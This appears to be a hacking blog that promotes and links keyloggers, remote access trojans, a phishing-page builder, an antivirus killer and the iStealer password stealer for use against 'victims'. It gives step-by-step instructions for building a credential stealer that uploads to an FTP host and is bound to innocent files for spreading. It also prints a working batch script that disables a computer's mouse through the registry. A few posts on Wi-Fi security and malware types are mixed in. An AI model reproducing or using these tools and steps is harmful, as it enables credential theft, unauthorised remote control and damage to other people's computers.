Tuesday, 31 January 2017

Trying to purchase a new domain with .com.pk
touch with us for more update soon.
find me on fb
seems to be very busy..

Friday, 22 April 2016

ardamax kwylogger

Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.

Here is tutorial for setup
Tutorial

For Download
Download Here

or

Here

IP anonymizer

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.


Download:

Turkojan gold

Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling  the victim computer in many ways. 

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected. 

Download

Or

Here

Ha**k computer Remotly

PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses a client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect the victim's PC in different ways. Just create the server and send it to the victim. 

Download

Phisher creator

Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.

Download

OR

Here

TCP dump

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity.

Download

wireshark

Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail you need. Wireshark has many powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types.

Download

SMAC mac addresse changer

SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.

  •     Automatically Activate MAC Address after changing
  •     display the manufacturer of the MAC Address
  •     Generate any New MAC Address based on a selected manufacturer
  •     Preload MAC Addresses List n choose the new MAC address from the list.
  •     IPConfig button click to display network adapter  info to confirm changes
  •     Userfriendly GUI
Download

swiss

Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook Freezer IM Spammer and also a Batch Virus creator.

Download

Or

Here

Av killer

avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security  tasks on victim pc. These tasks include firewall, antivirus, windows defender and various other services.

Download

Or

Here

Istraler

istealer

This is tutorial specially for that people who are know lil bit about configure a stealers server.

before start we need to sign up a ftp service i recomended this site
http://www.drivehq.com

STEP 1

 Get the staeler from following link 

STEP 2

Run application and extract it
Click on "iStealer".
IF YOU GET ERROR MISSING COMDLG32.OCX 
Downloaded the missing OCX extract it into WINDOWS>SYSTEM32

STEP 3 ( Create server for steal passwords )

 Host copy and paste this "ftp.drivehq.com"
Username enter your drivehq.com username.
Password enter your drivehq.com password.

After this if you want to bind your server(password stealer)
with another application, song, document, picture etc. Click "bind with another file" and chose what file U want 2 bind your server with ... Also you can cahnge icon and thn buildserver. After make compress it and upload and spread where u want

Most harmful viruses



 All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from Trojans , Worms and Spywares. All can be dangerous for your computers . Today i'll tell about difference them

VIRUS 
 A virus is a self replication program and software which is attached to an executeable  
 files. When file is opened or executed the virus automatically gets executed and enter into system memory .when enters it searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.
Worms
Worms are very similar to viruses but differ in way that they don't bind themselves to executable files instead  to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.
Trojan Horse

A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to  facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.
Spyware
A spyware is a program and software that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.

Here is the list of names of most harmful virus and worms in the history of computers
  •  Storm Worm
  •  Leap-A/Oompa- A
  •  Sasser and Netsky
  •  MyDome (Novarg)
  •  SQL Slammer / Sapphire
  •  Nimda
  •  Code Red and Code Red II
  •  The Klez
  •  ILOVEYOU
  •  Melissa

WiFi security tips


Wifi stands for Wireless Fidelity.
Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible and Moreover securing a wifi network is a bit tricky for most of the people so they give up their hopes quite early and leave their wifi network unsecured.Their are several loopholes through which your unsecured wireless connection can be easily hacked.So ,In this post you will know how to secure your wifi network with simple steps.



If your wireless network has been hacked or accessed by somebody else then it may lead to complete usage of your data if you have a limited data plan or worse it may lead to extra charges on you.Even if you have unlimited data plan then also you will get less speed if your wifi has been hacked.
 The step by step  guide given below summarize all the necessary steps you should take for securing your wifi network.

  • Change Default Administrator Passwords (and Usernames)
 Whenever you purchase a new moden or new connection then you are required to configure your modem.The modem configuration page can be accessed by entering a username and password for protecting it from unauthorized access.By default the usernames that most of the modem companies use are admin or administrator and the default password that is used is password,public,admin or some other simple word.So change your usename and password as soon as you setup your modem because these username and password combinations are known by most of the hacker .
  • Turn on (Compatible) WPA / WEP Encryption
 Most of the modern modems allows both wpa and wep for securing your wifi.Applying these keys will not only encrypt your wifi network connection but it will also apply authentication .So,you should select the strongest encryption to secure your wifi network.
  • Enable MAC Address Filtering
 Mac addresses are also known as  physical address of a computer.Mac address is unique address of a computer and it is static and cannot be changed.So,your router can be configured to connect to only to those devices whose MAC address match to the home devices.It will secure your wifi connection by just allowing the home devices to connect to it.
  • Enable Firewalls On Each Computer and the Router
 Most of the modern routers come with a inbuilt firewall capability to secure your wifi network.Make sure that your router firewall is turned on if your router has one.On the other hand you can also use firewall in your computers.They provide an extra and a strong layer of protection to secure your wifi connection from hackers or network attackers.
  • Position the Router or Access Point Safely
A small leakage of wifi signal from home to the outside cannot be stopped but the leakage of the signal can be minised to a greater extent by just changing the direction of your antenna of the router.Never place your router near windows instead try to place it in the center of the house.You will get best quality of wifi signal through out home with less leakage of wifi signal to the outer world.
  • Turn Off the Network During Extended Periods of Non-Use
 Turn of the router when it is not used.It will secure your wifi connection by giving out less access  time to hackers to your wifi network and it will be difficult for them to hack in short period of time.Moreover it will be saving your electricity which will be a secondary advantage for you.

Make a virus to disable mouse

Make a virus to disable mouse
  
  • Open Notepad and copy below codes

rem ---------------------------------
 rem Disable Mouse
 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
 reg delete %key%
 reg add %key% /v Start /t REG_DWORD /d 4

 rem ---------------------------------
  • Save this file as virus.bat
  • Done you just created your virus.

Saturday, 16 April 2016

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

How To Disable , Destroy , Crash Someone Facebook Id

ThIS is VerY simple And 101% Working Trick

http://34255353309

Just Ask Your Vicitm or Friend To Copy This Link And Comment It to his profile picture


If victim do this his id was temporary locked And Asking Photo Verification

It's 100% Working Method.

Charge Your Smartphone 25% faster

Enable Airplane Mode While You Charge

The secret to charging your smartphone up to 25% faster is simple—just enable Airplane Mode while you charge. This works because it turns off battery-draining connectivity radios and lets your phone focus on charging and charging alone.

https://www.facebook.com/notifications.php?refid=17

Cs documentries

Top documentaries on computer.


The Signal http://www.imdb.com/title/tt2910814/ 2014
BlackHat http://www.imdb.com/title/tt2717822/ 2015
The Score http://www.imdb.com/title/tt0227445/ 2001
Anti-Trust http://www.imdb.com/title/tt0218817/ 2001
The Matrix http://www.imdb.com/title/tt0133093/ 1999
The Lawnmower Man http://www.imdb.com/title/tt0104692/ 1992
Fool Proof http://www.imdb.com/title/tt0356614/ 2003
Sneakers http://www.imdb.com/title/tt0105435/ 1992
GoldenEye http://www.imdb.com/title/tt0113189/ 1995
Untraceable http://www.imdb.com/title/tt0880578/ 2008
Disclosure http://www.imdb.com/title/tt0109635/ 1994
Mission: Impossible - Ghost Protocolhttp://www.imdb.com/title/tt12292382011